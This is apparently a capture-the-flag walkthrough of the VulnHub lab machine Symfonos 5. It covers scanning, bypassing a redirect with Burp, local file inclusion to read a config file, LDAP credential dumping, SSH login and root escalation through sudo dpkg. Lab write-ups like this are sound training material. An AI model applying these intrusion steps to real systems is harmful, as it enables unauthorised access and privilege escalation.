Today, We are going to pwn Symfonos 5 by Zayotic from Vulnhub
Beginner real life based machine designed to teach people the importance of understanding from the interior.
Download Link : https://www.vulnhub.com/entry/symfonos-52,415/
Lets Begin with our Initial Scan
Nmap Scan Results:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA) | 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA) |_ 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 636/tcp open ldapssl?
Normal Webpage with an Image like always.
Started My Gobuster to find any useful directories.
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.101 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,html [+] Timeout: 10s =============================================================== 2020/03/12 22:11:24 Starting gobuster =============================================================== /index.html (Status: 200) /static (Status: 301) /home.php (Status: 302) /admin.php (Status: 200) /logout.php (Status: 302) /portraits.php (Status: 200) /server-status (Status: 403) =============================================================== 2020/03/12 22:13:28 Finished ===============================================================
When I visit
/home.php it redirects to
/admin.php Lets capture the request in burp.
302 Found which is redirection, We can stop a redirection using burp.
All we need to do is change
302 Found to
200 Ok For that open
Proxy -> Options -> Match and Replace.
Now we can visit
When checking those tabs this looks Local FIle Inclusion
I checked that in Burp and yeah its a LFI
I tried to read
admin.php using LFI
Its looks like a password :
qMDdyZh3cT6eeAWD for ldap
We can use
ldapsearch tool since we got password.
-b searchbase Use searchbase as the starting point for the search instead of the default. -x Use simple authentication instead of SASL. -D binddn Use the Distinguished Name binddn to bind to the LDAP directory. For SASL binds, the server is expected to ignore this value. -w password Use passwd as the password for simple authentication
We got User
zeus Password which is base64 encoded.
zeus : cetkKf4wCuHC9FET
I tried login with this in SSH
Like always I started with
We can run
dpkg as root without password.
Searched that in GTFOBins
The machine doesn’t have fpm so I created that payload in my machine and uploaded here.